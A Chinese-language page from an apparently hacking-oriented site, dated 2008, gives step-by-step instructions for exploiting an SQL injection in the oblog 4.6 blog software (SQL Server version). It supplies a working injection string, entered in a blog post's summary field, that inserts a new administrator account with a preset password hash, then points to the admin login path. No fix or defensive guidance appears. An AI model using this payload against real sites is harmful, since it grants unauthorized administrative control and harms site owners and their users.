热点资讯 |软件学院 |软件工具 |下载软件 |影院快车 | 设为主页 | 加入收藏

骇安网海量绿色软件免费下载

您现在的位置: 骇安网 >> 网络学院 >> 漏洞研究 >> 正文

    oblog4.6添加后台管理员漏洞(仅适用于sql版)

    作者:佚名    文章来源:本站原创    点击数:    更新时间:2008-9-13

     
    1、注册一个用户,用户名script,密码123456
    2、发布一篇日志,日志标题:测试一下
    3、个人前台首页找到日志"测试一下",点"推荐"
    4、个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成:


    s'/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);--

    5、最后点"确认提交"按钮,如果提示修改成功,注入完成!
    6、登录后台,地址/admin/admin_login.asp,输入上面的用户名和密码,登录后台成功!

最新更新 | 软件排行 | 关于我们 | 广告合作 | 帮助(?) | 网站声明 | 网站地图 | 友情链接